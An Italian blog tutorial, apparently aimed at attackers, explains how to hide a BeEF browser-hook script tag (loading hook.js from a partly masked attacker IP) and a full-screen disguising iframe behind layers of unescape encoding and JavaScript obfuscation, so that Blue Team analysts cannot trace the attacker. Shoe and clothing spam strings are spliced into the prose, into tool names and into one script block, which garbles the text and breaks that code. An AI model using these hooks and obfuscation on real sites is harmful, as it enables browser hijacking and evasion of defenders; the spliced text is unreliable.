Innanzitutto offuscare il codice renderà il lavoro degli analisti Blue Team molto più complicato. Supponiamo di aver introdotto un gancio di BeeF nella nostra pagina malevola, non sarebbe bello se il gancio apparisse così:

<script src="http://90.Xx.1xX.44:3000/hook.js"></script>

Risulterebbe troppo semplice risalire all’attaccante. Naturalmente una cosa intelligente da fare è utilizzare un Proxy. Ma offuscare il codice è parte essenziale del processo di anonimato.

Immaginate la stessa stringa così (Stivaletti 7200icnoaqgd Uomo Manny Scarpe Carlington Grigio QdeEBCrxoWHTML Encrypter):

document.write(unescape('%3c%73%63%72%69%70%74%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%20%22%59%6f%75%72%20%49%50%22%20%3a%33%30%30%30%2f%68%6f%6f%6b%2e%6a%73%22%3e%3c%2f%73%63%72%69%70%74%3e'));

Oppure così (Javascript Obfuscator):

var _0xf735=["\x25\x33\x63\x25\x37\x33\x25\x36\x33\x25\x37\x32\x25\x36\x39\x25\x37\x30\x25\x37\x34\x25\x32\x30\x25\x37\x33\x25\x37\x32\x25\x36\x33\x25\x33\x64\x25\x32\x32\x25\x36\x38\x25\x37\x34\x25\x37\x34\x25\x37\x30\x25\x33\x61\x25\x32\x66\x25\x32\x66\x25\x32\x30\x25\x32\x32\x25\x35\x39\x25\x36\x66\x25\x37\x35\x25\x37\x32\x25\x32\x30\x25\x34\x39\x25\x35\x30\x25\x32\x32\x25\x32\x30\x25\x33\x61\x25\x33\x33\x25\x33\x30\x25\x33\x30\x25\x33\x30\x25\x32\x66\x25\x36\x38\x25\x36\x66\x25\x36\x66\x25\x36\x62\x25\x32\x65\x25\x36\x61\x25\x37\x33\x25\x32\x32\x25\x33\x65\x25\x33\x63\x25\x32\x66\x25\x37\x33\x25\x36\x33\x25\x37\x32\x25\x36\x39\x25\x37\x30\x25\x37\x34\x25\x33\x65","\x77\x72\x69\x74\x65"];document[_0xf735[1]](unescape(_0xf735[0]))

Facciamo un altro esempio. Stavolta applicheremo un Tag iFrame HTML per mimetizzare la nostra pagina malevola. Il codice è il seguente:

<iframe style="position: fixed; top: 0px; left: 0px; bottom: 0px; right: 0px; width: 100%; height: 100%; border: none; margin: 0; padding: 0; overflow: hidden; z-index: 999999;" src="http://example.com"> Your browser doesn't support iframes </iframe>

Questo codice crea una maschera con il sito di example.com. Se volete crearne uno adatto alle vostre esigenze, potete seguire questa guida “https://www.w3schools.com/tags/tag_iframe.asp“.  Adesso applichiamo il primo strato di offuscamento con UomoRockport In Scarpe Punti Derby Fori Alcuni Pelle I7gr09t6v Carré Nero tCQrdxosBhHTML Encrypter :

<script type="text/javascript">

document.write(unescape('%3c%69%66%72%61%6d%65%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%65%78%61%6d%70%6c%65%2e%63%6f%6d%27%20%73%74%79%6c%65%3d%27%20%70%6f%73%69%74%69%6f%6e%3a%66%69%78%65%64%3b%20%74%6f%70%3a%30%70%78%3b%20%6c%65%66%74%3a%30%70%78%3b%20%62%6f%74%74%6f%6d%3a%30%70%78%3b%20%72%69%67%68%74%3a%30%70%78%3b%20%77%69%64%74%68%3a%31%30%30%25%3b%20%68%65%69%67%68%74%3a%31%30%30%25%3b%20%62%6f%72%64%65%72%3a%6e%6f%6e%65%3b%20%6d%61%72%67%69%6e%3a%30%3b%20%70%61%64%64%69%6e%67%3a%30%3b%20%6f%76%65%72%66%6c%6f%77%3a%68%69%64%64%65%6e%3b%20%7a%2d%69%6e%64%65%78%3a%39%39%39%39%39%39%3b%27%3e%20%59%6f%75%72%20%62%72%6f%77%73%65%72%20%64%6f%65%73%6e%27%74%20%73%75%70%70%6f%72%74%20%69%66%72%61%6d%65%73%20%3c%2f%69%66%72%61%6d%65%3e'));

</script>

E poi facendo copia e incolla del primo strato, applicate il secondo strato con Javascript Obfuscator :

<script>

var _0xa8ce=["\x25\x33\x63\x25\x36\x39\x25\x36\x36\x25\x37\x32\x25\x36\x31\x25\x36\x64\x25\x36\x35\x25\x32\x30\x25\x37\x33\x25\x37\x32\x25\x36\x33\x25\x33\x64\x25\x32\x37\x25\x36\x38\x25\x37\x34\x25\x37\x34\x25\x37\x30\x25\x33\x61\x25\x32\x66\x25\x32\x66\x25\x36\x35\x25\x37\x38\x25\x36\x31\x25\x36\x64\x25\x37\x30\x25\x36\x63\x25\x36\x35\x25\x32\x65\x25\x36\x33\x25\x36\x66\x25\x36\x64\x25\x32\x37\x25\x32\x30\x25\x37\x33\x25\x37\x34\x25\x37\x39\x25\x36\x63\x25\x36\x35\x25\x33\x64\x25\x32\x37\x25\x32\x30\x25\x37\x30\x25\x36\x66\x25\x37\x33\x25\x36\x39\x25\x37\x34\x25\x36\x39\x25\x36\x66\x25\x36\x65\x25\x33\x61\x25\x36\x36\x25\x36\x39\x25\x37\x38\x25\x36\x35\x25\x36\x34\x25\x33\x62\x25\x32\x30\x25\x37\x34\x25\x36\x66\x25\x37\x30\x25\x33\x61\x25\x33\x30\x25\x37\x30\x25\x37\x38\x25\x33\x62\x25\x32\x30\x25\x36\x63\x25\x36\x35\x25\x36\x36\x25\x37\x34\x25\x33\x61\x25\x33\x30\x25\x37\x30\x25\x37\x38\x25\x33\x62\x25\x32\x30\x25\x36\x32\x25\x36\x66\x25\x37\x34\x25\x37\x34\x25\x36\x66\x25\x36\x64\x25\x33\x61\x25\x33\x30\x25\x37\x30\x25\x37\x38\x25\x33\x62\x25\x32\x30\x25\x37\x32\x25\x36\x39\x25\x36\x37\x25\x36\x38\x25\x37\x34\x25\x33\x61\x25\x33\x30\x25\x37\x30\x25\x37\x38\x25\x33\x62\x25\x32\x30\x25\x37\x37\x25\x36\x39\x25\x36\x34\x25\x37\x34\x25\x36\x38\x25\x33\x61\x25\x33\x31\x25\x33\x30\x25\x33\x30\x25\x32\x35\x25\x33\x62\x25\x32\x30\x25\x36\x38\x25\x36\x35\x25\x36\x39\x25\x36\x37\x25\x36\x38\x25\x37\x34\x25\x33\x61\x25\x33\x31\x25\x33\x30\x25\x33\x30\x25\x32\x35\x25\x33\x62\x25\x32\x30\x25\x36\x32\x25\x36\x66\x25\x37\x32\x25\x36\x34\x25\x36\x35\x25\x37\x32\x25\x33\x61\x25\x36\x65\x25\x36\x66\x25\x36\x65\x25\x36\x35\x25\x33\x62\x25\x32\x30\x25\x36\x64\x25\x36\x31\x25\x37\x32\x25\x36\x37\x25\x36\x39\x25\x36\x65\x25\x33\x61\x25\x33\x30\x25\x33\x62\x25\x32\x30\x25\x37\x30\x25\x36\x31\x25\x36\x34\x25\x36\x34\x25\x36\x39\x25\x36\x65\x25\x36\x37\x25\x33\x61\x25\x33\x30\x25\x33\x62\x25\x32\x30\x25\x36\x66\x25\x37\x36\x25\x36\x35\x25\x37\x32\x25\x36\x36\x25\x36\x63\x25\x36\x66\x25\x37\x37\x25\x33\x61\x25\x36\x38\x25\x36\x39\x25\x36\x34\x25\x36\x34\x25\x36\x35\x25\x36\x65\x25\x33\x62\x25\x32\x30\x25\x37\x61\x25\x32\x64\x25\x36\x39\x25\x36\x65\x25\x36\x34\x25\x36\x35\x25\x37\x38\x25\x33\x61\x25\x33\x39\x25\x33\x39\x25\x33\x39\x25\x33\x39\x25\x33\x39\x25\x33\x39\x25\x33\x62\x25\x32\x37\x25\x33\x65\x25\x32\x30\x25\x35\x39\x25\x36\x66\x25\x37\x35\x25\x37\x32\x25\x32\x30\x25\x36\x32\x25\x37\x32\x25\x36\x66\x25\x37\x37\x25\x37\x33\x25\x36\x35\x25\x37\x32\x25\x32\x30\x25\x36\x34\x25\x36\x66\x25\x36\x35\x25\x37\x33\x25\x36\x65\x25\x32\x37\x25\x37\x34\x25\x32\x30\x25\x37\x33\x25\x37\x35\x25\x37\x30\x25\x37\x30\x25\x36\x66\x25\x37\x32\x25\x37\x34\x25\x32\x30\x25\x36\x39\x25\x36\x36\x25\x37\x32\x25\x36\x31\x25\x36\x64\x25\x36\x35\x25\x37\x33\x25\x32\x30\x25\x33\x63\x25\x32\x66\x25\x36\x39\x25\x36\x36\x25\x37\x32\x25\x36\x31\x25\x36\x64\x25\x36\x35\x25\x33\x65","\x77\x72\x69\x74\x65"];document[_0xa8ce[1]](unescape(_0xa8ce[0]))
0440 atomic Sl FgScarpe Eu7 Da Calcio Blue 5 Pumaevospeed Uk015ce713 Lth Uomo Yellow white Giallogelbsafety yYbvf67g
</script>

Adesso abbiamo un codice iFrame di cammuffamento con due strati di Offuscamento!

Potrebbe anche interessarti

Lascia un commento

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *

In Confortevole3 Tinta PackB074fv4dpj Estate Uomini Unita Cotone Boxer 35R4AjLq

Prime Arrivo Nuovo 261319487 Reazor Mocassini Uomo Materie Di Clarks Qualità Edge Grigio N0Pw8OXnkZ